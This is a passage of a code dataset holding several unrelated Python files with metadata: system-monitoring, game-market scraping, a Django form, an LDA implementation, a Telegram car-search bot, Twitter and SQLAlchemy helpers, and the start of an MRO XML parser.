line.setdefault('CPU利用率',str(int(psutil.cpu_percent())) + '%')\n info['CPU']=line\n\n line={}\n line.setdefault('空闲内存G',str(round(psutil.virtual_memory().free/(1024.0*1024.0*1024.0), 2)))\n line.setdefault('总内存G',str(int(round(psutil.virtual_memory().total/(1024.0*1024.0*1024.0)))))\n line.setdefault('内存利用率',str(int((psutil.virtual_memory().total-psutil.virtual_memory().free)/float(psutil.virtual_memory().total)*100))+ '%')\n info['Memory'] =line\n \n line={}\n \n io = psutil.disk_partitions()\n j=0\n except Exception as err:\n recordLog(str(err))\n\t\n for i in io:\n diskstr=[]\n try:\n o = psutil.disk_usage(i.device)\n except Exception as err:\n recordLog(str(err))\n j=j+1\n continue\n \n disk=io[j][0].strip(r':\\\\')\n diskstr.append(str(int(o.free/(1024.0*1024.0*1024.0)))+\"G\")\n diskstr.append(str(int(o.total/(1024.0*1024.0*1024.0)))+\"G\") \n line.setdefault(disk,diskstr)\n del(diskstr)\n j=j+1\n\n info['Disk']=line\n try:\n info.setdefault('version',gl.getvalue('version'))\n except Exception as err:\n recordLog(\"version write err\")\n \n return info\n\ndef getPath():\n #获取服务执行程序的路径\n try:\n key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,r\"SYSTEM\\CurrentControlSet\\Services\\PCInfo\")\n downloadPath =winreg.QueryValueEx(key,\"ImagePath\")\n path=os.path.dirname(downloadPath[0][1:])\n except Exception as err:\n path=r'c:\\windows\\system32'\n recordLog('Path change err: '+ str(err))\n return path\n\n\ndef get_time_stamp():\n ct = time.time()\n local_time = time.localtime(ct)\n data_head = time.strftime(\"%Y-%m-%d %H:%M:%S\", local_time)\n data_secs = (ct - int(ct)) * 1000\n time_stamp = \"%s.%03d\" % (data_head, data_secs)\n return time_stamp\n", "sub_path": "python-book01/2018/2018-07/PChealth/pc_info_windowsService/WebAPI.py", "file_name": "WebAPI.py", "file_ext": "py", "file_size_in_byte": 5748, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.basicConfig", "line_number": 15, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 15, "usage_type": "attribute"}, {"api_name": "urllib.parse.parse_qs", "line_number": 27, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 40, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 42, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path", "line_number": 54, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 78, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 80, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 85, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 98, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 103, "usage_type": "call"}, {"api_name": "psutil.cpu_count", "line_number": 121, "usage_type": "call"}, {"api_name": "psutil.cpu_percent", "line_number": 122, "usage_type": "call"}, {"api_name": "psutil.virtual_memory", "line_number": 126, "usage_type": "call"}, {"api_name": "psutil.virtual_memory", "line_number": 127, "usage_type": "call"}, {"api_name": "psutil.virtual_memory", "line_number": 128, "usage_type": "call"}, {"api_name": "psutil.disk_partitions", "line_number": 133, "usage_type": "call"}, {"api_name": "psutil.disk_usage", "line_number": 141, "usage_type": "call"}, {"api_name": "globalvar.getvalue", "line_number": 156, "usage_type": "call"}, {"api_name": "winreg.OpenKey", "line_number": 165, "usage_type": "call"}, {"api_name": "winreg.HKEY_LOCAL_MACHINE", "line_number": 165, "usage_type": "attribute"}, {"api_name": "winreg.QueryValueEx", "line_number": 166, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 167, "usage_type": "call"}, {"api_name": "os.path", "line_number": 167, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 175, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 176, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 177, "usage_type": "call"}]} +{"seq_id": "570612328", "text": "# Install python 3, duh!\n# Run the command below in a cmd window to install the needed packages, without the #, duh!\n# pip install bs4 requests pandas openpyxl lxml html5lib\n# Run the python file with the included batch file, DUH!\n\ntry:\n # Error handling if something happens during script initialisation\n from csv import QUOTE_ALL # Needed to export data to CSV\n from bs4 import BeautifulSoup # Needed to parse the dynamic webpage of the Ducanator\n from requests import get # Needed to get the webpage of the Ducanator\n from re import search # Needed to find the json string to import into pandas\n from pandas import read_csv, set_option, concat, DataFrame, read_json, read_html, ExcelWriter # Needed to convert the json string into a usable dataframe object for manipulation\n from traceback import format_exc # Needed for more friendly error messages.\n from openpyxl import load_workbook\n from numpy import arange\n from os import path\nexcept ModuleNotFoundError:\n print('OOPSIE WOOPSIE!! Uwu We made a fucky wucky!! A wittle fucko boingo! The code monkeys at our headquarters are working VEWY HAWD to fix this!')\n print('You didn\\'t install the packages like I told you to. Please run \\\"pip install bs4 requests pandas\\\" in a cmd window to install the required packages!')\n print('\\033[1;31m' + format_exc())\n exit(1)\n\ntry:\n #User Variables\n workbook_name = 'Prime_Relic_Data.xlsx'\n csv_name = 'Prime-Relic Data.csv'\n sheet_name_day = 'Day'\n sheet_name_hour = 'Hour'\n sheet_name_relic = 'Relic_Data'\n retry_attempts = 10\n # Sets the URL to scrape, because hard-coding is bad\n print('Downloading Ducat Data')\n url_ducats = \"https://warframe.market/tools/ducats\"\n # Scrapes the given URL\n soup = str(BeautifulSoup(get(url_ducats).content, \"html.parser\")).replace('\\n', '')\n print('Ducat Data Downloaded')\n print('Processing Ducat Data')\n # Finds the needed json string for item data, previous hour data, and previous day data.\n # Slices off the first bit to make a valid json string for pandas later\n items = search('\"items\": (\\[(?:\\[??[^\\[]*?\\]))', soup).group(0)[9:]\n previous_hour = search('\"previous_hour\": (\\[(?:\\[??[^\\[]*?\\]))', soup).group(0)[17:]\n previous_day = search('\"previous_day\": (\\[(?:\\[??[^\\[]*?\\]))', soup).group(0)[16:]\n\n # Reads and sanitises the item data into a pandas dataframe\n df_items = read_json(items)\n df_items = df_items.drop(columns=['url_name', 'thumb'])\n df_items = df_items.reindex(columns=['id', 'item_name'])\n\n # Reads and sanitises the previous day data into a pandas dataframe\n df_previous_day = read_json(previous_day)\n df_previous_day = df_previous_day.drop(columns=['id', 'plat_worth', 'median'])\n df_previous_day = df_previous_day.rename(columns={'item': 'id'})\n # Merges the item data and previous day data on the id column, drops the redundant id column, then renames the column names for export\n df_previous_day_merged = df_items.merge(df_previous_day, how='inner', on='id')\n df_previous_day_merged = df_previous_day_merged.drop(columns=['id'])\n df_previous_day_merged = df_previous_day_merged.reindex(columns=['item_name', 'datetime', 'ducats_per_platinum', 'ducats', 'wa_price','ducats_per_platinum_wa', 'position_change_month', 'position_change_week', 'position_change_day', 'volume'])\n df_previous_day_merged = df_previous_day_merged.sort_values(by='item_name')\n df_previous_day_merged['datetime'] = df_previous_day_merged['datetime'].astype(str).str[:-6]\n\n # Reads and sanitises the previous hour data into a pandas dataframe\n df_previous_hour = read_json(previous_hour)\n df_previous_hour = df_previous_hour.drop(columns=['id', 'plat_worth', 'median'])\n df_previous_hour = df_previous_hour.rename(columns={'item': 'id'})\n # Merges the item data and previous hour data on the id column, drops the redundant id column, then renames the column names for export\n df_previous_hour_merged = df_items.merge(df_previous_hour, how='inner', on='id')\n df_previous_hour_merged = df_previous_hour_merged.drop(columns=['id'])\n df_previous_hour_merged = df_previous_hour_merged.reindex(columns=['item_name', 'datetime', 'ducats_per_platinum', 'ducats', 'wa_price','ducats_per_platinum_wa', 'position_change_month', 'position_change_week', 'position_change_day', 'volume'])\n df_previous_hour_merged = df_previous_hour_merged.sort_values(by='item_name')\n df_previous_hour_merged['datetime'] = df_previous_hour_merged['datetime'].astype(str).str[:-6]\n df_previous_hour_merged = df_previous_hour_merged.reset_index(drop=True)\n\n print('Ducat Data Processed')\n # Fuck Comments\n print('Downloading Relic Data')\n url_relics = \"https://n8k6e2y6.ssl.hwcdn.net/repos/hnfvc0o3jnfvc873njb03enrf56.html\"\n relic_data_txt_name = 'RelicData.txt'\n\n if path.isfile(relic_data_txt_name):\n with open(relic_data_txt_name) as f:\n soup = str(f.readlines())\n print(\"Loaded Local Relic Data\")\n else:\n print(\"Loading Remote Item Data\")\n\n for x in range(0, retry_attempts):\n try:\n soup = str(BeautifulSoup(get(url_relics).content, \"html.parser\")).replace('\\n', '')\n print('Saving Local Data')\n with open(relic_data_txt_name, 'w') as f:\n f.write(soup)\n break\n except Exception:\n print('Relic data download failed, retrying... ' + str(retry_attempts - x - 1) + ' attempts left...', end='\\r')\n\n\n print('Relic Data Downloaded')\n print('Processing Relic Data')\n parsed_relics = search('

    Relics:

    .*?
    ', soup).group(0)[34:].replace('th>', 'td>').replace(r'', r'').replace('X Kuva', 'x Kuva')\n df_parsed_relics = read_html(parsed_relics, header=None)\n df_parsed_relics = df_parsed_relics[0].replace(to_replace=r'.+\\((.+)\\%\\)', value=r'\\1', regex=True)\n df_parsed_relics[1] = df_parsed_relics[1].astype(float)\n df_parsed_relics = df_parsed_relics.dropna(how='all').fillna(999)\n groups = df_parsed_relics.groupby(arange(len(df_parsed_relics.index)) // 7, sort=False).apply(lambda x: x.sort_values(by=1, ascending=False))\n groups[1] = ' (' + groups[1].astype(str) + '%)'\n groups = groups[0] + groups[1]\n groups = groups.replace(to_replace=r'\\(999.0\\%\\)', value=r'', regex=True)\n templist = []\n templist2 = []\n for count, value in enumerate(groups):\n if count % 7 == 0 and count != 0:\n templist2.append(templist)\n templist = []\n templist.append(value)\n df_even_more_parsed_relics = DataFrame(templist2, columns=['Relic_Name', 'C1', 'C2', 'C3', 'U1', 'U2', 'Rare'])\n df_relic_class = df_even_more_parsed_relics['Relic_Name'].str.split().str[0]\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'Class', df_relic_class, allow_duplicates=True)\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'Type', df_even_more_parsed_relics['Relic_Name'].str.upper().str.split().str[1], allow_duplicates=True)\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'Refinement', df_even_more_parsed_relics['Relic_Name'].str.split().str[3].replace(to_replace=r'[\\(\\)]', value=r'', regex=True), allow_duplicates=True)\n dict = {'Exceptional':'','Flawless':'','Radiant':''}\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'C1_Raw', df_even_more_parsed_relics['C1'].replace(to_replace=r' \\(.+\\)',value='',regex=True))\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'C2_Raw', df_even_more_parsed_relics['C2'].replace(to_replace=r' \\(.+\\)',value='',regex=True))\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'C3_Raw', df_even_more_parsed_relics['C3'].replace(to_replace=r' \\(.+\\)',value='',regex=True))\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'U1_Raw', df_even_more_parsed_relics['U1'].replace(to_replace=r' \\(.+\\)',value='',regex=True))\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'U2_Raw', df_even_more_parsed_relics['U2'].replace(to_replace=r' \\(.+\\)',value='',regex=True))\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'Rare_Raw', df_even_more_parsed_relics['Rare'].replace(to_replace=r' \\(.+\\)',value='',regex=True))\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'C1_Odds', df_even_more_parsed_relics['C1'].replace(to_replace=r'.+\\((.+)\\%\\)',value=r'\\1',regex=True).astype(float))\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'C2_Odds', df_even_more_parsed_relics['C2'].replace(to_replace=r'.+\\((.+)\\%\\)',value=r'\\1',regex=True).astype(float))\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'C3_Odds', df_even_more_parsed_relics['C3'].replace(to_replace=r'.+\\((.+)\\%\\)',value=r'\\1',regex=True).astype(float))\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'U1_Odds', df_even_more_parsed_relics['U1'].replace(to_replace=r'.+\\((.+)\\%\\)',value=r'\\1',regex=True).astype(float))\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'U2_Odds', df_even_more_parsed_relics['U2'].replace(to_replace=r'.+\\((.+)\\%\\)',value=r'\\1',regex=True).astype(float))\n df_even_more_parsed_relics.insert(len(df_even_more_parsed_relics.columns), 'Rare_Odds', df_even_more_parsed_relics['Rare'].replace(to_replace=r'.+\\((.+)\\%\\)',value=r'\\1',regex=True).astype(float))\n df_even_more_parsed_relics = df_even_more_parsed_relics.replace(to_replace=r'Systems Blueprint',value=r'Systems', regex=True)\n df_even_more_parsed_relics = df_even_more_parsed_relics.replace(to_replace=r'Neuroptics Blueprint',value=r'Neuroptics', regex=True)\n df_even_more_parsed_relics = df_even_more_parsed_relics.replace(to_replace=r'Chassis Blueprint',value=r'Chassis', regex=True)\n #print(df_even_more_parsed_relics.head(5))\n #df_even_more_parsed_relics['Relic_Name'] = df_even_more_parsed_relics['Relic_Name'].str.split(n=1).str[1]\n #df_axi = df_even_more_parsed_relics[df_even_more_parsed_relics['Relic_Class']=='Axi'].reset_index(drop=True)\n #df_lith = df_even_more_parsed_relics[df_even_more_parsed_relics['Relic_Class']=='Lith'].reset_index(drop=True)\n #df_meso = df_even_more_parsed_relics[df_even_more_parsed_relics['Relic_Class']=='Meso'].reset_index(drop=True)\n #df_neo = df_even_more_parsed_relics[df_even_more_parsed_relics['Relic_Class']=='Neo'].reset_index(drop=True)\n #df_requiem = df_even_more_parsed_relics[df_even_more_parsed_relics['Relic_Class']=='Requiem'].reset_index(drop=True)\n #df_final_export_relic = concat([df_axi,df_lith,df_meso,df_neo,df_requiem], axis=1, ignore_index=True)\n #print(df_even_more_parsed_relics)\n print('Relic Data Processed')\n\n # Export data\n print('Exporting Worksheet')\n df_even_more_parsed_relics.to_csv(csv_name, index=None, quoting=QUOTE_ALL)\n df_previous_day_merged.to_csv('DayPrices.csv', index=None, quoting=QUOTE_ALL)\n with ExcelWriter(workbook_name, mode='a', engine='openpyxl', if_sheet_exists='replace') as writer:\n df_previous_day_merged.to_excel(writer, sheet_name=sheet_name_day)\n df_previous_hour_merged.to_excel(writer, sheet_name=sheet_name_hour)\n df_even_more_parsed_relics.to_excel(writer, sheet_name=sheet_name_relic)\n #df_final_export_relic.to_excel(writer, sheet_name=sheet_name_relic)\n book = load_workbook(workbook_name)\n sheet = book[sheet_name_day]\n sheet.delete_cols(1,1)\n sheet = book[sheet_name_hour]\n sheet.delete_cols(1,1)\n sheet = book[sheet_name_relic]\n sheet.delete_cols(1,1)\n book.save(workbook_name)\n print('If you see this message, things should have worked correctly. Remove the \\\"pause\\\" from the batch script to automatically close this window after use.')\n\nexcept Exception:\n # Error handling if something happens during the main script\n print('OOPSIE WOOPSIE!! Uwu We made a fucky wucky!! A wittle fucko boingo! The code monkeys at our headquarters are working VEWY HAWD to fix this!')\n print('\\033[1;31m' + format_exc())\n exit(1)\n", "sub_path": "Scrape the Ducanator.py", "file_name": "Scrape the Ducanator.py", "file_ext": "py", "file_size_in_byte": 12314, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "traceback.format_exc", "line_number": 20, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 35, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 35, "usage_type": "call"}, {"api_name": "re.search", "line_number": 40, "usage_type": "call"}, {"api_name": "re.search", "line_number": 41, "usage_type": "call"}, {"api_name": "re.search", "line_number": 42, "usage_type": "call"}, {"api_name": "pandas.read_json", "line_number": 45, "usage_type": "call"}, {"api_name": "pandas.read_json", "line_number": 50, "usage_type": "call"}, {"api_name": "pandas.read_json", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 87, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 87, "usage_type": "call"}, {"api_name": "re.search", "line_number": 98, "usage_type": "call"}, {"api_name": "pandas.read_html", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 103, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 114, "usage_type": "call"}, {"api_name": "csv.QUOTE_ALL", "line_number": 148, "usage_type": "name"}, {"api_name": "csv.QUOTE_ALL", "line_number": 149, "usage_type": "name"}, {"api_name": "pandas.ExcelWriter", "line_number": 150, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 155, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 168, "usage_type": "call"}]} +{"seq_id": "413518482", "text": "from .models import User\nfrom django import forms\n\nclass UserForm(forms.ModelForm):\n class Meta:\n # specify model to be used\n model = User\n\n # specify fields to be used\n fields = [\n \"first_name\",\n \"second_name\",\n ]", "sub_path": "students/y2333/practical_works/Gordienko_Maxim/Practice 2/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 282, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.forms.ModelForm", "line_number": 4, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 4, "usage_type": "name"}, {"api_name": "models.User", "line_number": 7, "usage_type": "name"}]} +{"seq_id": "167001807", "text": "\"\"\"\nSimple implementation of (Fisher's) Linear Discriminant Analysis.\nThanks to: https://www.python-course.eu/linear_discriminant_analysis.php\n\nThe L. D. Matrix is a transformation matrix which best separates\nthe instances of different classes in data projection.\n\"\"\"\nimport numpy as np\n\n\nclass LDA:\n def fit(self, X, y):\n \"\"\"Fit dataset into LDA model.\"\"\"\n self.X = np.array(X)\n self.y = np.array(y)\n\n self.classes, self.cls_freqs = np.unique(y, return_counts=True)\n\n def _scatter_within(self):\n \"\"\"This measure describes how scattered are each class.\"\"\"\n scatter_within = np.array([\n (cls_freq - 1) * np.cov(self.X[self.y == cls, :], rowvar=False)\n for cls, cls_freq in zip(self.classes, self.cls_freqs)\n ]).sum(axis=0)\n\n return scatter_within\n\n def _scatter_between(self):\n \"\"\"This measure describes the separation between different classes.\"\"\"\n class_means = np.array(\n [self.X[self.y == cls, :].mean(axis=0) for cls in self.classes])\n\n total_mean = self.X.mean(axis=0)\n\n scatter_factor = class_means - total_mean\n\n scatter_between = np.array([\n freq * np.outer(sf, sf)\n for freq, sf in zip(self.cls_freqs, scatter_factor)\n ]).sum(axis=0)\n\n return scatter_between\n\n def _get_eig(self, sw, sb):\n \"\"\"Get eigenval/vec from (ScatterWithin)^(-1)*(ScatterBetween) mat.\"\"\"\n sw_inv = np.linalg.inv(sw)\n\n return np.linalg.eig(np.matmul(sw_inv, sb))\n\n def _project(self, eig, num_dim):\n \"\"\"Get the K (``num_dim``) most expressive eigenvalues/vectors.\"\"\"\n eig_vals, eig_vecs = eig\n\n eig_vals, eig_vecs = zip(\n *sorted(\n zip(eig_vals, eig_vecs),\n key=lambda item: item[0],\n reverse=True)[:num_dim])\n\n return eig_vals, eig_vecs\n\n def predict(self, max_dim=2):\n \"\"\"Create transf. matrix which best separates the fitted data proj.\"\"\"\n sw = self._scatter_within()\n sb = self._scatter_between()\n\n max_dim = min(max_dim, self.classes.size-1)\n\n eig = self._get_eig(sw, sb)\n\n eig_vals, eig_vecs = self._project(eig, num_dim=max_dim)\n\n _, num_col = self.X.shape\n\n self.eig_vals = np.array(eig_vals)\n self.transf_mat = np.concatenate(eig_vecs).reshape(num_col, max_dim)\n\n self.transf_mat = self.transf_mat.real\n\n return self.transf_mat\n\n def wilks_lambda(self):\n \"\"\"Compute Wilks' Lambda measure using eigenvalues of L. D. matrix.\"\"\"\n return np.prod(1.0 / (1.0 + self.eig_vals))\n\n def canonical_corr(self):\n \"\"\"Calculate canonical correlation values from L. D. matrix.\"\"\"\n return (self.eig_vals / (1.0 + self.eig_vals))**0.5\n\n\nif __name__ == \"__main__\":\n from sklearn import datasets\n iris = datasets.load_iris()\n\n model = LDA()\n model.fit(iris.data, iris.target)\n ans = model.predict(max_dim=2)\n\n print(\"Transformation Matrix:\", ans, sep=\"\\n\", end=\"\\n\\n\")\n print(\"Eigenvalues of L. D. matrix:\", model.eig_vals, end=\"\\n\\n\")\n print(\"Canonical Correlation:\", model.canonical_corr(), end=\"\\n\\n\")\n print(\"Wilks' Lambda:\", model.wilks_lambda())\n", "sub_path": "model-implementation/py-linear-disc-analysis/lda.py", "file_name": "lda.py", "file_ext": "py", "file_size_in_byte": 3243, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.array", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.cov", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.outer", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 46, "usage_type": "attribute"}, {"api_name": "numpy.linalg.eig", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 48, "usage_type": "attribute"}, {"api_name": "numpy.matmul", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.prod", "line_number": 84, "usage_type": "call"}, {"api_name": "sklearn.datasets.load_iris", "line_number": 93, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 93, "usage_type": "name"}]} +{"seq_id": "291454234", "text": "import os\nimport time\n\nfrom telegram import Update\nfrom telegram.ext import Updater, CommandHandler\n\nfrom data.copart import Copart\nfrom data.utils import EditThread\n\n\ndef search(update: Update, context):\n default_args = [*([0, float('inf')] * 2)]\n names = ['year_from', 'year_to', 'price_from', 'price_to']\n try:\n filters = {names[i]: int(context.args[i]) if i < len(context.args) and context.args[i] != '-1'\n else default_args[i] for i in range(len(default_args))}\n except ValueError:\n return update.message.reply_text('Все аргументы должны быть целочисленными!')\n message = update.message.reply_text('Начинаем поиск...')\n edit_thread = EditThread(message)\n edit_thread.start()\n start_time = time.time()\n copart = Copart()\n output = copart.get_data(filters)\n edit_thread.stop()\n update.message.reply_text(f'Найдено {len(output)} автомобилей.\\n'\n f'Время поиска: {time.time() - start_time:.2f} секунд')\n for car in output:\n update.message.reply_text(car['ld'])\n\n\ndef start(update, _):\n update.message.reply_text('Привет! Это бот-парсер американских автобирж. '\n 'Введите /search {year_from} {year_to} {price_from} {price_to} '\n 'для поиска авто')\n\n\ndef main():\n updater = Updater(os.getenv('tg_token'))\n updater.dispatcher.add_handler(CommandHandler('start', start))\n updater.dispatcher.add_handler(CommandHandler('search', search, pass_args=True))\n updater.start_polling()\n updater.idle()\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "parsing/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1756, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "telegram.Update", "line_number": 11, "usage_type": "name"}, {"api_name": "data.utils.EditThread", "line_number": 20, "usage_type": "call"}, {"api_name": "time.time", "line_number": 22, "usage_type": "call"}, {"api_name": "data.copart.Copart", "line_number": 23, "usage_type": "call"}, {"api_name": "time.time", "line_number": 27, "usage_type": "call"}, {"api_name": "telegram.ext.Updater", "line_number": 39, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 39, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 40, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "596920294", "text": "import json\nimport tweepy\nfrom tweepy import OAuthHandler\n\nclass _Twitter(type):\n\tdef __call__(cls, *args, **kwargs):\n\t\tif not hasattr(cls, 'instance'):\n\t\t\tcls.instance = super(_Twitter, cls).__call__(*args, **kwargs)\n\t\treturn cls.instance\n\nclass Twitter(object, metaclass=_Twitter):\n\tdef __init__(self):\n\t\tself.consumer_key = ''\n\t\tself.consumer_secret = ''\n\t\tself.access_key = ''\n\t\tself.access_secret = ''\n\t\tself.session = None\n\t\tself.api = None\n\t\tself.maxPage = 0\n\t\tself.maxCount = 0\n\n\tdef loadConfig(self):\n\t\twith open(\"config.json\") as data:\n\t\t\tconf = json.load(data)\n\t\t\tself.consumer_key = conf['consumer_key']\n\t\t\tself.consumer_secret = conf['consumer_secret']\n\t\t\tself.access_key = conf['access_key']\n\t\t\tself.access_secret = conf['access_secret']\n\t\t\tself.maxCount = int(conf['maxCount'])\n\t\t\tself.maxPage = int(conf['maxPage'])\n\t\treturn self\n\n\tdef auth(self):\n\t\tif self.session is None:\n\t\t\tself.session = OAuthHandler(self.consumer_key, self.consumer_secret)\n\t\t\tself.session.set_access_token(self.access_key, self.access_secret)\n\t\t\tself.api = tweepy.API(self.session, wait_on_rate_limit=True, wait_on_rate_limit_notify=True, compression=True)\n\t\treturn self\n\n\tdef getAPI(self):\n\t\treturn self.api\n\n\tdef getMaxCount(self):\n\t\treturn self.maxCount\n\n\tdef getMaxPage(self):\n\t\treturn self.maxPage\n\n\nAPI = Twitter().loadConfig().auth().getAPI()\nMaxCount = Twitter().getMaxCount()\nMaxPage = Twitter().getMaxPage()", "sub_path": "TwitterScraper/Twitter/Twitter.py", "file_name": "Twitter.py", "file_ext": "py", "file_size_in_byte": 1407, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "json.load", "line_number": 24, "usage_type": "call"}, {"api_name": "tweepy.OAuthHandler", "line_number": 35, "usage_type": "call"}, {"api_name": "tweepy.API", "line_number": 37, "usage_type": "call"}]} +{"seq_id": "127485154", "text": "from datetime import datetime, timezone\n\nfrom app.configs.database import SingletonSQLAlchemy\n\n\ndb = SingletonSQLAlchemy()\n\n\nclass BaseModel(db.Model):\n __abstract__ = True\n\n id = db.Column(db.Integer, primary_key=True)\n create_at = db.Column(db.DateTime(timezone=True), default=lambda: datetime.now(timezone.utc))\n updated_at = db.Column(db.DateTime(timezone=True), nullable=True)\n\n def before_save(self, *args, **kwargs):\n return\n\n def before_save(self, *args, **kwargs):\n return\n\n def save(self, commit=True):\n self.before_save()\n\n db.session.add(self)\n if commit:\n try:\n db.session.commit()\n except Exception as error:\n db.session.rollback()\n raise error\n\n self.before_save()\n\n def delete(self, commit=True):\n db.session.delete(self)\n if commit:\n db.session.delete(self)\n", "sub_path": "app/models/bases_model.py", "file_name": "bases_model.py", "file_ext": "py", "file_size_in_byte": 933, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "app.configs.database.SingletonSQLAlchemy", "line_number": 6, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 13, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 13, "usage_type": "name"}, {"api_name": "datetime.timezone.utc", "line_number": 13, "usage_type": "attribute"}, {"api_name": "datetime.timezone", "line_number": 13, "usage_type": "name"}]} +{"seq_id": "495205823", "text": "from lxml import etree\nimport dateutil.parser\nfrom pandas import DataFrame, Series\nimport pandas as pd\nfrom functools import reduce\nimport json\nimport pymongo\nfrom pymongo import MongoClient\n\nclass MroReader:\n def __init__(self, afilter, **kwargs):\n super().__init__(**kwargs)\n self.item_dicts=[]\n self.afilter=afilter\n\n def display(self):\n for item_dict in self.item_dicts:\n print(item_dict)\n\n def read(self, item_measurement, item_id):\n for item_element in item_measurement:\n if item_element.tag == 'smr':\n item_key = item_element.text.replace('MR.', '').split(' ')\n else:\n centerFilled=False\n item_dict = {}\n neighbor_list=[]\n for item_v in item_element:\n item_value = item_v.text.replace('NIL', '-1').split(' ')\n _item_sub_dict = dict(zip(item_key, map(int, item_value)))\n _item_sub_dict = {k: v for k, v in _item_sub_dict.items() if not any(ext in k for ext in self.afilter)}\n if _item_sub_dict['LteNcPci']>=0:\n _neighbor={}\n _neighbor.update({'Pci': _item_sub_dict['LteNcPci']})\n _neighbor.update({'Rsrp': _item_sub_dict['LteNcRSRP']})\n neighbor_list.append(_neighbor)\n else:\n break\n if not centerFilled:\n item_dict.update(item_element.attrib)\n item_dict.update({'Rsrp': _item_sub_dict['LteScRSRP']})\n item_dict.update({'SinrUl': _item_sub_dict['LteScSinrUL']})\n item_dict.update({'Ta': _item_sub_dict['LteScTadv']})\n item_dict.update({'Pci': _item_sub_dict['LteScPci']})\n centerFilled=True\n if len(neighbor_list)>0:\n item_dict.update({'NeighborList': neighbor_list})\n self.item_dicts.append(item_dict)\n\n def read_zte(self, item_measurement, item_id):\n for item_element in item_measurement:\n if item_element.tag == 'smr':\n item_key = item_element.text.replace('MR.', '').split(' ')\n if 'LteScEarfcn' not in item_key:\n return\n else:\n centerFilled=False\n item_dict = {}\n neighbor_list=[]\n for item_v in item_element:\n item_value = item_v.text.replace('NIL', '-1').split(' ')\n _item_sub_dict = dict(zip(item_key, map(int, item_value)))\n _item_sub_dict = {k: v for k, v in _item_sub_dict.items() if not any(ext in k for ext in self.afilter)}\n if _item_sub_dict['LteNcPci']>=0:\n _neighbor={}\n _neighbor.update({'Pci': 